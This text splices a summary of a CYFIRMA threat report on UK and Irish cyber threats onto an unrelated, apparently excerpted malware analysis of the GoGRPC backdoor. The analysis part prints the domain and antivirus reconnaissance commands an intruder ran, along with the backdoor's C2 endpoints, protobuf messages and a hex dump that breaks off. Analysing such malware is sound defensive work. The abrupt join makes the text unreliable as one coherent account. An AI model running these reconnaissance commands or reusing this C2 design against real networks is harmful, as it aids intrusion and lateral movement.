A CYFIRMA threat intelligence report warns that the UK and Ireland face a converging cyber threat landscape where ransomware gangs, nation-state actors, and hacktivists increasingly target the same sectors. Russia (APT28, APT29) and China (APT15, GALLIUM) are named as primary state threats, with North Korea's Lazarus Group running fake job-offer campaigns against defence firms. Qilin leads ransomware activity in the region (Jan–May 2026), with professional services and manufacturing hit hardest. Financially motivated groups like FIN6 and Scattered Spider are using creative social engineering via LinkedIn and helpdesk impersonation. The dark web trade in UK/Irish data is active, with large credential and personal data sets for sale. Critical vulnerabilities in n8n, Cisco, Fortinet, and VMware products are flagged as actively exploited. Recommendations include accelerating patching, enforcing phishing-resistant MFA, testing incident response plans, and tightening third-party access controls.
AppDataLocalTempssd.exe net user "$env:UserName" /domain ; "" nltest /domain_trusts powershell Get-CimInstance -Namespace "root/SecurityCenter2" -ClassName "AntiVirusProduct" -ErrorAction Stop powershell net user "$env:UserName" /domain ; "" nltest /domain_trusts powershell systeminfo ; whoami /groups ; net user "$env:UserName" /domain ; echo AD_Computers: ("(ObjectClass=computer)").FindAll().count ; nltest /domain_trusts systeminfo These commands are indicative of an initial access broker that is performing reconnaissance for lateral movement.GoGPRC C2 communicationAs the name suggests, GoGRPC uses gRPC over HTTP/2 to communicate with C2 servers. This is not typical in public C2 frameworks such as Mythic or Sliver, which generally use gRPC for internal communication between framework components. For example, Sliver uses gRPC to connect the C2 server to the applications that operators use to interact with the backend server. There are projects with a similar approach, such as GRAT and C2 Chopper, but their protocol implementations differ from GoGRPC’s implementation.Using gRPC can help maintain a low communication profile and make detection more difficult by blending the traffic with other legitimate HTTP/2 network streams. The gRPC servers are configured to listen on port 443. However, in the Lep and Giver variants, the communication was not encrypted with TLS. TLS support was added in the Pet and Kind variants. The gRPC client is configured to send requests to the endpoint /agent.AgentService/Connect. In the Kind variant, the endpoint was changed to /Refuse/Connect.The following messages are defined:RegisterRequestRegisterResponseEstablishConnectionEstablishConnectionResultExecuteCommandExecuteCommandResultHeartbeatGoGRPC initiates communication with an initial handshake using RegisterRequest to send an agent ID and other system information from the victim’s system with the following protobuf definition.message AgentMetadata { message TagsEntry { string key = 1; string value = 2; } string agent_id = 1; string username = 2; string hostname = 3; string domainname = 4; string os = 5; string arch = 6; repeated .agent.AgentMetadata.TagsEntry tags = 7; } message RegisterRequest { .agent.AgentMetadata metadata = 1; }The figure below shows an example of the RegisterRequest protobuf contents, including the agent ID and the victim’s information collected before GoGRPC communicates with the C2 server.0000 0a 54 0a 24 64 30 63 65 36 66 36 30 2d 62 31 39 ·T·$d0ce 6f60-b19 0010 66 2d 34 38 33 35 2d 38 30 36 38 2d 65 66 34 33 f-4835-8 068-ef43 0020 32 66 37 37 66 38 64 66 1a 0f 44 45 53 4b 54 4f 2f77f8df ··DESKTO 0030 50 2d 31 46 32 41 54 53 4e 2a 14 57 69 6e 64 6f P-1F2ATS N